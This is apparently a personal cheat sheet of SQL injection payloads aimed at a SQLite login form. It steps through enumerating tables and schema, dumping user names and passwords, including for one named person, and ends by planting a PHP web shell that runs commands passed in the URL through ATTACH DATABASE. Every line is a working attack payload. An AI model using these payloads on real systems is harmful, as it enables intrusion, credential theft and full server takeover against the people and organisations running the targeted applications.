-- getting table names
user=foo' UNION SELECT group_concat(tbl_name),1,2,3 FROM sqlite_master;--&password=abc
user=foo' UNION SELECT group_concat(tbl_name),1,2,3 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%';--&password=ab
-- extracting column names
user=foo' UNION SELECT sql,2,3,4 from sqlite_master where name='users';--&password=abc
-- getting a username and a password
user=foo' UNION SELECT name,2,3,password from users--&password=abc
user=foo' UNION SELECT name,2,3,password from users limit 2 offset 10--&password=abc
-- get info for lucas washington
user=foo' UNION SELECT name,2,3,password from users where name like '%lucas_%'--&password=abc
-- planting a php file
?id=bob’; ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;--